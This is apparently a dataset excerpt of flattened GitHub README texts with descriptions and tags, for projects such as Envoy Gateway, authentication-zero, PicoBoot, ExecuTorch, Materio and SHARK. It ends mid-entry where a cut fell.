envoyproxy/gateway;Envoy Gateway Envoy Gateway is an open source project for managing Envoy Proxy as a standalone or Kubernetes-based application gateway. Gateway API resources are used to dynamically provision and configure the managed Envoy Proxies. Documentation Blog introducing Envoy Gateway. Goals Quickstart to use Envoy Gateway in a few simple steps. Roadmap Contact Slack: Join the Envoy Slack workspace if you're not already a member, then use the Envoy Gateway channel to start collaborating with the community. Contributing Code of conduct Contributing guide Developer guide Community Meeting The Envoy Gateway team meets every Tuesday and Thursday. We also have a separate meeting held in the Chinese timezone every two weeks to better accommodate our Chinese community members who face scheduling difficulties for the weekly meetings. Please refer to the meeting details for additional information. Meeting details;Manages Envoy Proxy as a Standalone or Kubernetes-based Application Gateway;envoy,kubernetes,gateway-api,cncf,go-control-plane,api-gateway,hacktoberfest
envoyproxy/gateway
lazaronixon/authentication-zero;Authentication Zero The purpose of authentication zero is to generate a pre-built authentication system into a rails application (web or api-only) that follows both security and rails best practices. By generating code into the user's application instead of using a library, the user has complete freedom to modify the authentication system so it works best with their app. Installation $ bundle add authentication-zero If you are using Rails < 7.1, you must use version 2. $ bundle add authentication-zero --version "~> 2" Usage $ rails generate authentication Developer responsibilities Since Authentication Zero generates this code into your application instead of building these modules into the gem itself, you now have complete freedom to modify the authentication system, so it works best with your use case. The one caveat with using a generated authentication system is that it will not be updated after it's been generated. Therefore, as improvements are made to the output of rails generate authentication , it becomes your responsibility to determine if these changes need to be ported into your application. Security-related and other important improvements will be explicitly and clearly marked in the CHANGELOG.md file and upgrade notes. Features Essential Sign up Email and password validations Checks if a password has been found in any data breach (--pwned) Authentication by cookie Authentication by token (--api) Two-factor authentication + recovery codes (--two-factor) Two-factor authentication using a hardware security key (--webauthn) Verify email using a link with token Ask for the password before sensitive data changes, aka sudo (--sudoable) Reset the user password and send reset instructions Reset the user password only from verified emails Lock mechanism to prevent email bombing (--lockable) Rate limiting for your app, 1000 reqs/minute (--ratelimit) Send e-mail confirmation when your email has been changed Manage multiple sessions & devices Activity log (--trackable) Log out More Social login with OmniAuth (--omniauthable) Passwordless authentication (--passwordless) Send invitations (--invitable) "Sign-in as" button (--masqueradable) Multi-tenant application (--tenantable) Generated code has_secure_password : Adds methods to set and authenticate against a bcrypt password. authenticate_by : Given a set of attributes, finds a record using the non-password attributes, and then authenticates that record using the password attributes. generates_token_for : Defines the behavior of tokens generated for a specific purpose. signed cookies : Returns a jar that'll automatically generate a signed representation of the cookie value and verify it when reading from the cookie again. httponly cookies : A cookie with the httponly attribute is inaccessible to JavaScript; this precaution helps mitigate cross-site scripting (XSS) attacks. signed_id : Returns a signed id that is tamper-proof, so it's safe to send in an email or otherwise share with the outside world. current attributes : Abstract super class that provides a thread-isolated attributes singleton, which resets automatically before and after each request. action mailer : Action Mailer allows you to send email from your application using a mailer model and views. log filtering : Parameters 'token' and 'password' are marked [FILTERED] in the log. functional tests : In Rails, testing the various actions of a controller is a form of writing functional tests.
system testing : System tests allow you to test user interactions with your application, running tests in either a real or a headless browser. Sudoable Use before_action :require_sudo in controllers with sensitive information; it will ask for your password on first access or after 30 minutes. Tenantable Some artifacts are generated in the application which make it possible to implement row-level multitenancy applications. Current.account is set using the current user's account. You should follow some steps to make it work: Add account_id to each scoped table. ex: rails g migration add_account_to_projects account:references . Add include AccountScoped to scoped models. It sets up the account relationship and a default scope using the current account. Set Current.account through the URL: http://myapp.com/:account_id . (optional) Add require_relative "../lib/account_middleware" to config/application.rb . Add config.middleware.use AccountMiddleware to your application class. More customization is required... Development To release a new version, update the version number in version.rb , and then run bundle exec rake release , which will create a git tag for the version, push git commits and tags, and push the .gem file to rubygems.org . Contributing Bug reports and pull requests are welcome on GitHub at https://github.com/lazaronixon/authentication-zero. This project is intended to be a safe, welcoming space for collaboration, and contributors are expected to adhere to the code of conduct . License The gem is available as open source under the terms of the MIT License . Code of Conduct Everyone interacting in the AuthenticationZero project's codebases, issue trackers, chat rooms and mailing lists is expected to follow the code of conduct .;An authentication system generator for Rails applications. ;rails,ruby,authentication,generator,rails-authentication,api,auth,security,token
lazaronixon/authentication-zero
pliang279/awesome-phd-advice;Collection of advice for prospective and current PhD students By Paul Liang (pliang@cs.cmu.edu), Machine Learning Department and Language Technologies Institute , CMU , with help from many friends at CMU. If there are any links I missed, please let me know! Credit goes out to the original authors of each link. Table of Contents Other similar collections Advice for prospective students General advice Statement of purpose Visit days, choosing advisor and school Advice for current students PhD survival guides Research Reading Writing Blogposts Reviewing Presenting Advising students Teaching Fellowship applications Networking Organizing workshops and tutorials Attending academic conferences Job search Memoirs Other similar collections Grad School Advice by Jason Hong Advice for Research Students by Jason Eisner Advice for researchers and students by Michael Ernst Advice Collection by Tao Xie and Yuan Xie Awesome CS PhD application advice by Jed Yang CS PhD the greatest hits by Angela Jiang List of PhD reflections by Stephen Tu Thread of PhD application resources by Chaitanya Joshi Useful computer vision PhD resources by Yana Hasson Checklists for Stat-ML PhD students by Aaditya Ramdas Grad School Resources by Kalpesh Krishna AI Research Experiences by Pranav Rajpurkar Advice for prospective students General advice Applying to PhD Programs in Computer Science by Mor Harchol-Balter Graduate School Advice by Stanford CS Undergrad to PhD, or not - advice for undergrads interested in research by John Hewitt HOWTO: Get into grad school for science, engineering, math and computer science by Matt Might Applying for a PhD in NLP by Zhijing Jin and ACL Year-Round Mentorship Session Student Perspectives on Applying to NLP PhD Programs by Akari Asai, John Hewitt, Sidd Karamcheti, Kalpesh Krishna, Nelson Liu, Roma Patel, and Nicholas Tomlin Machine Learning PhD Applications — Everything You Need to Know by Tim Dettmers Demystifying ML PhD Admissions to US Universities by Hima Lakkaraju Demystifying PhD Admissions in Computer Science in the US: a Guide for Vietnamese and International Students by ThanhVu Nguyen A long, rambling, mostly personal corpus of advice on applying to Computer Science grad school (for UWCSE students) by Justine Sherry Ph.D. Applications: FAQ by Noah Smith Quora answer on the admission committee process by Scott Fahlman Reflecting on CS Graduate Admissions by David Anderson A PhD is Not Enough: A Guide to Survival in Science by Peter Feibelman The PhD in CS: Getting There and Being Successful by Michael Hilton, Janet Davis, and Ian Ludden Statement of purpose Database of Example PhD SOPs by the CS-SOP initiative Some Suggestions on writing your statement of purpose by Jennifer Mankoff Graduate School Personal Statements by Christopher Fletcher Inside PhD admissions: What readers look for in a Statement of Purpose by Nathan Schneider How to Write a Bad Statement by Andy Pavlo Tips and Tricks, How-To Guide for Grad School SoPs by Erica Weng Graduate School Statement of Purpose by MIT EECS How to write personal statement for graduate school application by Stanley Chan Writing a Google AI Residency Cover Letter by Katherine Lee and Ben Eysenbach Public examples: [Cody Coleman] , [Sai Rallabandi] , [Jeremy Lacomis] , [Sean Kross] , [Zahid Hossain] , [Jean Yang] Visit days, choosing advisor and school Questions to Ask a Prospective Ph.D. 
Advisor on Visit Day, With Thorough and Forthright Explanations by Andrew Kuznetsov How to Choose Your Grad School by Tim Dettmers How to Pick a Graduate Advisor by Ben Barres The Definitive ‘what do I ask/look for’ in a PhD Advisor Guide by Columbia CS Advice for current students PhD survival guides So long, and thanks for the PhD by Ronald T. Azuma Graduate School: Keys To Success by Remzi Arpaci-Dusseau The illustrated guide to a PhD by Matt Might How to Be a Successful PhD Student by Mark Dredze, Hanna Wallach Time Management by Randy Pausch Advice to a Beginning Graduate Student by Manuel Blum Finances for CS PhD students by David Anderson A Survival Guide to a PhD by Andrej Karpathy 15 pieces of advice I wish my PhD advisor had given me by Jim Kurose The Tao of PhD: Thriving in the Allen School’s Graduate Program by University of Washington 10 tips for PhD students by Daniela Witten Expectation Setting by Eugene Vinitsky Research How to Do Great Research by Nick Feamster and Alex Gray How to Have a Bad Career How to Have a Bad Career in Research/Academia by David Patterson Useful Thoughts about Research by H.T. Kung You and Your Research by Richard Hamming Advice on Research and Writing by Mark Leone Reading How to Read a Paper by Srinivasan Keshav How to Read a Technical Paper by Jason Eisner Writing How to write a good CVPR submission by Bill Freeman Ten Simple Rules for Mathematical Writing by Dimitri Bertsekas Notes on writing by Fredo Durand How to write a (hopefully good) paper by Martin Vetterli Blogposts PhDLife Blog - A collection of blog posts from Warwick University Reviewing Reviewer Tutorial by CVPR 2022 How to write a good review by CVPR 2020 How to write a reviewer report by Stanley Chan Presenting Giving an Academic Talk by Jonathan Shewchuk How to give a technical presentation by Michael Ernst Advising students (coming soon, send PR!) Teaching How to Be a Teaching Assistant by Jason Eisner Fellowship applications Tips for the NSF GRFP Application by Danielle Perry NSF GRFP Advice by Christine Liu NSF Fellowship by Alex Lang Tips by Tara Safavi Public examples: [Extensive NSF collection by Alex Lang] , [Victoria Dean (NSF personal)] , [Victoria Dean (NSF research)] , [Tara Safavi (NSF)] , [Paul Liang (Facebook)] , [Devendra Chaplot (Facebook)] , [Sai Rallabandi (Facebook)] Networking Networking on the Network: A Guide to Professional Skills for PhD Students by Phil Agre Organizing workshops and tutorials Hitchhiker’s guide to organizing an academic workshop by Ben Eysenbach and Surya Bhupatiraju Attending academic conferences Nine things I wish I had known the first time I came to NeurIPS by Jennifer Vaughan NeurIPS 2018 through the eyes of first-timers by Fangyu Cai How To Make A Plan To Attend International Academic Conferences Job search Tips for Computer Science Faculty Applications How to Ask for a Letter of Recommendation Interview Questions for Computer Science Faculty Jobs The Ph.D. 
Job Hunt - Helping Students Find the Right Positions by Ed Lazowska The N Things I wish I Knew Before the Job Search, by Maria Ebling, Guerney Hunt, Lily Mummert, Bill Tetzlaff, and John Davis The academic job search for computer scientists in 10 questions by Nicolas Papernot and Elissa Redmiles Checklist for faculty job-hunting in Stat/ML by Aaditya Ramdas Tips on the interview process by Jeannette Wing Getting an academic job by Michael Ernst Computer science graduate job and interview guide by Wes Weimer, Claire Le Goues, Zak Fry, Kevin Leach, Yu Huang, and Kevin Angstadt Academic job search advice by Matt Might Memoirs I loved graduate school by Peter Bailis What my PhD was like by Jean Yang How to get a Ph.D. in computer science if you're me by Chris Martens The N=1 guide to grad school by Adam Marcus;Collection of advice for prospective and current PhD students;phd-students,phd-application,research,computer-science,machine-learning
pliang279/awesome-phd-advice
Janspiry/Palette-Image-to-Image-Diffusion-Models;Palette: Image-to-Image Diffusion Models Paper | Project Brief This is an unofficial implementation of Palette: Image-to-Image Diffusion Models in PyTorch , and it is mainly inherited from its super-resolution version Image-Super-Resolution-via-Iterative-Refinement . The code template is from another of my seed projects: distributed-pytorch-template . Some implementation details, with the corresponding paper descriptions: We adapted the U-Net architecture used in Guided-Diffusion , which gives a substantial boost to sample quality. We used the attention mechanism in low-resolution features (16×16) as in vanilla DDPM . We encode the $\gamma$ rather than $t$ in Palette and embed it with an affine transformation. We fix the variance $\Sigma_\theta(x_t, t)$ to a constant during inference as described in Palette . Status Code [x] Diffusion Model Pipeline [x] Train/Test Process [x] Save/Load Training State [x] Logger/Tensorboard [x] Multiple GPU Training (DDP) [x] EMA [x] Metrics (now for FID, IS) [x] Dataset (now for inpainting, uncropping, colorization) [x] Google colab script 🌟(now for inpainting) Task I try to finish the following tasks in order: - [x] Inpainting on CelebaHQ 🚀 ( Google Colab ) - [x] Inpainting on Places2 with 128×128 centering mask 🚀 The follow-up experiments are uncertain due to lack of time and GPU resources: [ ] Uncropping on Places2 [ ] Colorization on ImageNet val set Results The DDPM model requires significant computational resources, and we have only built a few example models to validate the ideas in this paper. Visuals Celeba-HQ Results with 200 epochs and 930K iterations, and the first 100 samples with the centering mask and irregular mask . | | | | ------------------------------------------------ | ---- | Places2 with 128×128 centering mask Results with 16 epochs and 660K iterations, and several picked samples with the centering mask . | | | | | | ------------------------------------------------------------ | ------------------------------------------------------------ | ------------------------------------------------------------ | ---- | | | | | | Uncropping on Places2 Results with 8 epochs and 330K iterations, and several picked samples for uncropping . | | | | ------------------------------------------------ | ---- | Metrics | Tasks | Dataset | EMA | FID(-) | IS(+) | | -------------------- | ----------- | -------- | ---- | -------------------- | | Inpainting with centering mask | Celeba-HQ | False | 5.7873 | 3.0705 | | Inpainting with irregular mask | Celeba-HQ | False | 5.4026 | 3.1221 | Usage Environment python pip install -r requirements.txt Pre-trained Model | Dataset | Task | Iterations | GPUs×Days×Bs | URL | | --------- | ---------- | ---------- | ------------ | ------------------------------------------------------------ | | Celeba-HQ | Inpainting | 930K | 2×5×3 | Google Drive | | Places2 | Inpainting | 660K | 4×8×10 | Google Drive | Bs indicates the batch size per GPU. Data Prepare We got most of the datasets from Kaggle, which may be slightly different from the official versions, and you can also download them from the official websites. - CelebA-HQ resized (256x256) Kaggle - Places2 Official | Places2 Kaggle - ImageNet Official We use the default division of these datasets for training and evaluation. The file lists we use can be found in Celeba-HQ , Places2 . After you have prepared your own data, you need to modify the corresponding config file to point to your data.
Take the following as an example: yaml "which_dataset": { // import designated dataset using arguments "name": ["data.dataset", "InpaintDataset"], // import Dataset() class "args":{ // arguments to initialize dataset "data_root": "your data path", "data_len": -1, "mask_mode": "hybrid" } }, More choices for the dataloader and validation split can also be found in the datasets part of the config file. Training/Resume Training Download the checkpoints from the given links. Set resume_state in the config file to the directory of the previous checkpoint. Take the following as an example; this directory contains the training states and the saved model: yaml "path": { //set every part file path "resume_state": "experiments/inpainting_celebahq_220426_150122/checkpoint/100" }, 2. Set your network label in the load_everything function of model.py ; the default is Network . Following the tutorial settings, the optimizers and models will be loaded from 100.state and 100_Network.pth respectively. python netG_label = self.netG.__class__.__name__ self.load_network(network=self.netG, network_label=netG_label, strict=False) Run the script: python python run.py -p train -c config/inpainting_celebahq.json We tested the U-Net backbones used in SR3 and Guided Diffusion , and the Guided Diffusion one has more robust performance in our current experiments. More choices for backbone , loss and metric can be found in the which_networks part of the config file. Test Modify the config file to point to your data following the steps in the Data Prepare part. Set your model path following the steps in the Resume Training part. Run the script: python python run.py -p test -c config/inpainting_celebahq.json Evaluation Create two folders holding ground-truth images and sample images; their file names need to correspond to each other. Run the script: python python eval.py -s [ground image path] -d [sample image path] Acknowledgements Our work is based on the following theoretical works: - Denoising Diffusion Probabilistic Models - Palette: Image-to-Image Diffusion Models - Diffusion Models Beat GANs on Image Synthesis and we are benefiting a lot from the following projects: - openai/guided-diffusion - LouisRouss/Diffusion-Based-Model-for-Colorization;Unofficial implementation of Palette: Image-to-Image Diffusion Models by Pytorch;ddpm,image-restoration,ddp,implementation,pytorch,diffusion-model
Janspiry/Palette-Image-to-Image-Diffusion-Models
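To make the γ-encoding note above concrete, here is a minimal PyTorch sketch of embedding the noise level γ (instead of the integer timestep t) with a sinusoidal encoding followed by an affine transformation. The dimensions and the exact encoding are illustrative assumptions, not this repository's code.

```python
# Illustrative sketch, not the repository's implementation: embed the noise
# level gamma (instead of the integer timestep t) and pass it through an
# affine (linear) transformation, as the notes above describe.
import math
import torch
import torch.nn as nn

class GammaEmbedding(nn.Module):
    def __init__(self, dim: int = 128):
        super().__init__()
        self.dim = dim
        self.affine = nn.Linear(dim, dim)  # the affine transformation

    def forward(self, gamma: torch.Tensor) -> torch.Tensor:
        half = self.dim // 2
        freqs = torch.exp(
            -math.log(10_000) * torch.arange(half, dtype=torch.float32) / (half - 1)
        )
        angles = gamma.float()[:, None] * freqs[None, :]
        sinusoid = torch.cat([angles.sin(), angles.cos()], dim=-1)  # (B, dim)
        return self.affine(sinusoid)

emb = GammaEmbedding()(torch.rand(4))  # a batch of 4 noise levels in [0, 1)
print(emb.shape)  # torch.Size([4, 128])
```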
h4h13/Paisa;Paisa - Expense Tracker Material design expense manager ⚠ Join the Telegram Group for important updates Screenshots Mobile | | | | | | :--------------------------------------------------: | :--------------------------------------------------: | :--------------------------------------------------: | :--------------------------------------------------: | | Home | Accounts | Categories | Budget overview | Foldable | | | | | | :-------------------------------------------------------------: | :-------------------------------------------------------------: | :-------------------------------------------------------------: | :-------------------------------------------------------------: | | Home | Accounts | Categories | Budget overview | Tablet & Desktop | | | | | | :-------------------------------------------------------------: | :-------------------------------------------------------------: | :-------------------------------------------------------------: | :-------------------------------------------------------------: | | Home | Accounts | Categories | Budget overview | Expense Tracking Tracking expenses, incomes & deposits Account & budget overview Manage categories Steps to translate Create an .arb file inside lib/localization named app_<language_code>.arb , for example app_en.arb Copy all translations from app_en.arb to the created file and remove all keys annotated with @ From json { "appTitle": "Paisa", "@appTitle": { "description": "The app name", "type": "text", "placeholders": {} } } To json { "appTitle": "Paisa" } Check untranslated.json for any missing keys that need to be translated Run the app and check once Steps to build the project Clone the Flutter project: Use git clone https://github.com/RetroMusicPlayer/Paisa.git to download the project from the GitHub repository. Install Dependencies: Navigate to the project directory and run flutter pub get to install the required dependencies. Run the App: Connect a device or emulator and run the app using flutter run --flavor dev or through your IDE. Download License Copyright (c) 2022, Hemanth Savarala All rights reserved. This source code is licensed under the GPLv3-style license found in the LICENSE file in the root directory of this source tree.;Expense manager for Android with Material Design;android,blocstatemanagement,clean-architecture,windows,bloc,dart,flutter,injectable,material-design,material-ui
h4h13/Paisa
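The translation steps above reduce to copying app_en.arb and dropping every @-prefixed metadata key. A small hypothetical helper (not shipped with Paisa) could automate that; the file paths are assumptions based on the steps above.

```python
# Hypothetical helper (not shipped with Paisa): copy app_en.arb to a new
# locale file, dropping the "@"-prefixed metadata keys as described above.
import json
from pathlib import Path

def make_locale_stub(language_code: str, src: str = "lib/localization/app_en.arb") -> Path:
    entries = json.loads(Path(src).read_text(encoding="utf-8"))
    stripped = {k: v for k, v in entries.items() if not k.startswith("@")}
    dst = Path(src).with_name(f"app_{language_code}.arb")
    dst.write_text(json.dumps(stripped, ensure_ascii=False, indent=2), encoding="utf-8")
    return dst

print(make_locale_stub("de"))  # lib/localization/app_de.arb, ready to translate
```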
webhdx/PicoBoot;PicoBoot This is a long-awaited IPL replacement modchip for the Nintendo GameCube. It's open source, cheap and easy to install. Join the Discord Server to get support and discuss new features: Features it's open source uses a $4 Raspberry Pi Pico board very easy installation, only 5 wires to solder programmable via USB cable, without any drivers or programs automatically boots any DOL app of your choice uses an "IPL injection" approach superior to mods like XenoGC Video guides and features overview PicoBoot Modchip Will Unleash The POWER of Your Nintendo GAMECUBE! | Installation Guide and Overview by MachoNachoProductions This new Gamecube Modchip is a GAMECHANGER - PicoBoot by RockerGaming $5 Gamecube IPL Modchip?! Picoboot Dol-001 + Dol-101 Installation / Setup / Showcase by ModzvilleUSA! PicoBoot GameCube custom mod chip - make and install your own chip with a Raspberry Pi Pico by Joe Bleeps Installation guide Head over to support.webhdx.dev for the Installation guide and Troubleshooting tips . I appreciate your work. Can I support you in any way? This project is free and available for everyone. If you want to support it anyway, consider using the :heart: Sponsor button. Hall of Fame I'd like to thank the people who helped make PicoBoot possible: * #gc-forever crew: Extrems , novenary , emu_kidid and others * tmbinc - he started it all 🙏 * happy_bunny - I started my research with his great writeup on Shuriken Attack * beta testers: seewood , MethodOrMadness , renanbianchi * content creators: MachoNachoProductions , RockerGaming , ModzvilleUSA! * people who sponsored this project * every PicoBoot enjoyer - it's all about you after all 😉 Acknowledgements Some parts of this project use GPL-2.0 licensed code from: * https://github.com/redolution/iplboot;Raspberry Pi Pico (RP2040) based IPL replacement modchip for GameCube;gamecube,modchip
webhdx/PicoBoot
pytorch/executorch;ExecuTorch ExecuTorch is an end-to-end solution for enabling on-device inference capabilities across mobile and edge devices including wearables, embedded devices and microcontrollers. It is part of the PyTorch Edge ecosystem and enables efficient deployment of PyTorch models to edge devices. Key value propositions of ExecuTorch are: Portability: Compatibility with a wide variety of computing platforms, from high-end mobile phones to highly constrained embedded systems and microcontrollers. Productivity: Enabling developers to use the same toolchains and SDK from PyTorch model authoring and conversion, to debugging and deployment to a wide variety of platforms. Performance: Providing end users with a seamless and high-performance experience due to a lightweight runtime and utilizing full hardware capabilities such as CPUs, NPUs, and DSPs. For a comprehensive technical overview of ExecuTorch and step-by-step tutorials, please visit our documentation website for the latest release (or the main branch ). Feedback We welcome any feedback, suggestions, and bug reports from the community to help us improve our technology. Please use the PyTorch Forums for discussion and feedback about ExecuTorch using the ExecuTorch category, and our GitHub repository for bug reporting. We recommend using the latest release tag from the Releases page when developing. Directory Structure executorch ├── backends # Backend delegate implementations. ├── build # Utilities for managing the build system. ├── codegen # Tooling to autogenerate bindings between kernels and the runtime. ├── configurations ├── docs # Static docs tooling. ├── examples # Examples of various user flows, such as model export, delegates, and runtime execution. ├── exir # Ahead-of-time library: model capture and lowering APIs. | ├── _serialize # Serialize final export artifact. | ├── backend # Backend delegate ahead of time APIs | ├── capture # Program capture. | ├── dialects # Op sets for various dialects in the export process. | ├── emit # Conversion from ExportedProgram to ExecuTorch execution instructions. | ├── operator # Operator node manipulation utilities. | ├── passes # Built-in compiler passes. | ├── program # Export artifacts. | ├── serde # Graph module serialization/deserialization. | ├── verification # IR verification. ├── extension # Extensions built on top of the runtime. | ├── android # ExecuTorch wrappers for Android apps. | ├── apple # ExecuTorch wrappers for iOS apps. | ├── aten_util # Converts to and from PyTorch ATen types. | ├── data_loader # 1st party data loader implementations. | ├── evalue_util # Helpers for working with EValue objects. | ├── gguf_util # Tools to convert from the GGUF format. | ├── kernel_util # Helpers for registering kernels. | ├── memory_allocator # 1st party memory allocator implementations. | ├── module # A simplified C++ wrapper for the runtime. | ├── parallel # C++ threadpool integration. | ├── pybindings # Python API for executorch runtime. | ├── pytree # C++ and Python flattening and unflattening lib for pytrees. | ├── runner_util # Helpers for writing C++ PTE-execution tools. | ├── testing_util # Helpers for writing C++ tests. | ├── training # Experimental libraries for on-device training ├── kernels # 1st party kernel implementations. | ├── aten | ├── optimized | ├── portable # Reference implementations of ATen operators. | ├── prim_ops # Special ops used in executorch runtime for control flow and symbolic primitives. 
| ├── quantized ├── profiler # Utilities for profiling runtime execution. ├── runtime # Core C++ runtime. | ├── backend # Backend delegate runtime APIs. | ├── core # Core structures used across all levels of the runtime. | ├── executor # Model loading, initialization, and execution. | ├── kernel # Kernel registration and management. | ├── platform # Layer between architecture specific code and portable C++. ├── schema # ExecuTorch PTE file format flatbuffer schemas. ├── scripts # Utility scripts for size management, dependency management, etc. ├── sdk # Model profiling, debugging, and introspection. ├── shim # Compatibility layer between OSS and Internal builds ├── test # Broad scoped end-to-end tests. ├── third-party # Third-party dependencies. ├── util # Various helpers and scripts. License ExecuTorch is BSD licensed, as found in the LICENSE file.;On-device AI across mobile, embedded and edge for PyTorch;deep-learning,embedded,machine-learning,mobile,neural-network,tensor,gpu
pytorch/executorch
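To tie the exir directories above to a concrete flow, here is a hedged sketch of the typical ahead-of-time path: capture a PyTorch module, lower it to the Edge dialect, and serialize a .pte file. API names can shift between ExecuTorch releases, so treat this as an outline rather than the definitive API.

```python
# Hedged sketch of the ahead-of-time flow the exir/ tree implements: capture a
# PyTorch module, lower it to the Edge dialect, and serialize a .pte artifact.
# Exact API names can differ between ExecuTorch releases.
import torch
from executorch.exir import to_edge

class TinyModel(torch.nn.Module):
    def forward(self, x: torch.Tensor) -> torch.Tensor:
        return torch.nn.functional.relu(x) + 1.0

example_inputs = (torch.randn(1, 4),)
exported = torch.export.export(TinyModel(), example_inputs)  # program capture
edge = to_edge(exported)                                     # lowering to the Edge dialect
et_program = edge.to_executorch()                            # runtime-ready program
with open("tiny_model.pte", "wb") as f:
    f.write(et_program.buffer)                               # flatbuffer PTE file
```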
themeselection/materio-mui-nextjs-admin-template-free;Materio - Free MUI NextJS Admin Template Most Powerful & Comprehensive Free MUI NextJS Admin Dashboard Template built for developers! Introduction 🚀 If you're a developer looking for the most powerful and comprehensive free MUI NextJS admin dashboard template, rich with features and highly customizable, look no further than Materio. We've followed the highest industry standards to bring you the very best admin template that is not only easy to use but highly scalable. Offering ultimate convenience and flexibility, you'll be able to build whatever application you want with very little hassle. Build premium quality applications with ease. Use one of the most innovative NextJS admin templates to create eye-catching, high-quality WebApps. Your apps will be completely responsive, ensuring they'll look stunning and function flawlessly on desktops, tablets, and mobile devices. Materio provides the template in both TypeScript and JavaScript. View Demo Features 📋 ⚡ Next.js with App Router support 💎 Integrated with MUI & Tailwind CSS ✅ TypeScript & JavaScript Support 📏 Linter with ESLint 💖 Code Formatter with Prettier 🗂 VSCode configuration: Settings, Extensions and Custom Snippets 💡 Absolute Imports with aliases ☕ Minify HTML & CSS 💨 Live reload ✅ Cache busting 🛠️ Easy to customize 😎 SEO-friendly 🚀 Production-ready Requirements ✅ Node.js LTS version (not current version) npm Installation ⚒️ Installing and running the template is super easy in Materio; please follow these steps and you should be ready to rock 🤘: Make sure you have installed Node.js (LTS). If Node.js is already installed in your system, make sure the installed version is LTS (and not the latest version) Navigate to the typescript-version or javascript-version folder and run the following command to install our local dependencies listed in the package.json file. You can use pnpm , yarn or npm as per your preference. It is recommended to use pnpm for better dependency management ```bash # For pnpm (recommended) pnpm install # For yarn yarn install # For npm npm install ``` Rename the .env.example file to .env Now, you are ready to start the server with the help of the command shown below. Open http://localhost:3000 to check your development 🚀. ```bash # For pnpm (recommended) pnpm dev # For yarn yarn dev # For npm npm run dev ``` What's Included 📦 Layouts Blank Full Boxed Dashboard Pages Account Settings Login Register Forgot Password Error Under Maintenance Iconify Icons Basic Cards Form Layouts What's in Premium Version 💎 | Materio Free Version | Materio Premium Version | | ----------------------------------------------- | :------------------------------------------------ | | Demo | Demo | | Download | Purchase | | Single vertical menu | Vertical (+ vertical collapsed) & Horizontal menu | | Default skin | Default, bordered & semi-dark skin | | 1 simple dashboard | 5 niche dashboards | | - | 10 Applications including eCommerce, academy, email, chat, calendar, invoice, kanban, etc.
| | Simple form layouts | Advanced form layouts, form validation & form wizard | | Basic cards | Basic, advanced, statistics, charts, gamification & action cards | | - | Quick search - quickly navigate between pages (with hotkey support) | | Basic tables | Advanced tables | | 1 chart library | 2 chart libraries | | 6 pages | 35+ pages | | Simple navbar & footer | Multiple navbar & footer options | | - | Authentication using NextAuth | | - | RTL (right-to-left) support | | - | Redux toolkit | | - | Multi-lingual support | | - | Starter-kit | | - | Customizer drawer to check options in live app | | Limited customization | Endless customization possibilities | | Regular support | Priority support | Documentation 📜 Check out our live Documentation Deployment 🚀 Check out our Deployment docs Browser Support 🖥️ * It also supports other browsers which implement the latest CSS standards Contributing 🦸 Contributions are always welcome and recommended! Here is how: Fork the repository ( here is the guide ). Clone to your machine git clone https://github.com/YOUR_USERNAME/REPO_NAME Make your changes Create a pull request Contribution Requirements 🧰 When you contribute, you agree to give a non-exclusive license to ThemeSelection to use that contribution in any context as we (ThemeSelection) see appropriate. If you use content provided by another party, it must be appropriately licensed using an open source license. Contributions are only accepted through GitHub pull requests. Finally, contributed code must work in all supported browsers (see above for browser support). Changelog 📆 Please refer to the CHANGELOG file. We will add detailed release notes to each new release. Support 🧑🏻‍💻 For free products, enjoy community support via GitHub issues. Upgrade to Premium for dedicated support from our expert team. License © Copyright © ThemeSelection Licensed under MIT All our free items are Open Source and licensed under MIT. You can use our free items for personal as well as commercial purposes. We just need an attribution from your end. Copy the link below and paste it in the footer of your web application or project. html <a href="https://themeselection.com/">ThemeSelection</a> Also Available In Looking For Premium Admin Templates? 👀 ThemeSelection provides selected, high-quality, modern-design, professional and easy-to-use fully coded dashboard templates & UI kits to create your applications faster! Bootstrap Admin Templates VueJS Admin Templates Laravel Admin Templates Django Admin Templates React (NextJS) Admin Templates ASP.Net Core Admin Templates Free UI Kits If you want to download free admin templates like Materio, do visit ThemeSelection . Useful Links 🎁 Vue CheatSheet Freebies Download Free Admin Templates Bootstrap 5 CheatSheet Social Media :earth_africa: Twitter Facebook Pinterest Instagram Discord YouTube;An enterprise-grade Next.js admin dashboard template. Made with developer experience first: Next.js v14 (App Router), Material UI (MUI), Tailwind CSS, TypeScript, ESLint, Prettier, VSCode Configs !! 🚀;admin-dashboard,admin-template,freebies,admin-dashboard-template,dashboard-template,nextjs-admin,boilerplate,free-admin-dashboard,free-admin-template,javascript
themeselection/materio-mui-nextjs-admin-template-free
nod-ai/SHARK;SHARK High Performance Machine Learning Distribution We are currently rebuilding SHARK to take advantage of Turbine . Until that is complete, make sure you use an .exe release or a checkout of the SHARK-1.0 branch for a working SHARK. Prerequisites - Drivers #### Install your Windows hardware drivers * [AMD RDNA Users] Download the latest driver (23.2.1 is the oldest supported) [here](https://www.amd.com/en/support). * [macOS Users] Download and install the 1.3.216 Vulkan SDK from [here](https://sdk.lunarg.com/sdk/download/1.3.216.0/mac/vulkansdk-macos-1.3.216.0.dmg). Newer versions of the SDK will not work. * [Nvidia Users] Download and install the latest CUDA / Vulkan drivers from [here](https://developer.nvidia.com/cuda-downloads) #### Linux Drivers * MESA / RADV drivers won't work with FP16. Please use the latest AMDGPU-PRO drivers (non-pro OSS drivers also won't work) or the latest NVIDIA Linux drivers. Other users, please ensure you have the latest vendor drivers and the Vulkan SDK from [here](https://vulkan.lunarg.com/sdk/home), and if you are using Vulkan, check that `vulkaninfo` works in a terminal window Quick Start for SHARK Stable Diffusion for Windows 10/11 Users Install the driver from [Prerequisites](https://github.com/nod-ai/SHARK#install-your-hardware-drivers) above Download the stable release or the most recent SHARK 1.0 pre-release . Double-click the .exe, or run it from the command line (recommended), and you should have the UI in the browser. If you have custom models, put them in a models/ directory where the .exe is. Enjoy. More installation notes * We recommend that you download the EXE into a new folder whenever you download a new EXE version. If you download it in the same folder as a previous install, you must delete the old `*.vmfb` files with `rm *.vmfb`. You can also use the `--clear_all` flag once to clean all the old files. * If you recently updated the driver or this binary (EXE file), we recommend you clear all the local artifacts with `--clear_all` ## Running * Open a Command Prompt or PowerShell terminal, change folder (`cd`) to the .exe folder. Then run the EXE from the command prompt. That way, if an error occurs, you'll be able to cut-and-paste it to ask for help. (if it always works for you without error, you may simply double-click the EXE) * The first run may take a few minutes while the models are downloaded and compiled. Your patience is appreciated. The download could be about 5GB. * You will likely see a Windows Defender message asking you to give permission to open a web server port. Accept it. * Open a browser to access the Stable Diffusion web server. By default, the port is 8080, so you can go to http://localhost:8080/. * If you prefer to always run in the browser, use the `--ui=web` command argument when running the EXE. ## Stopping * Select the command prompt 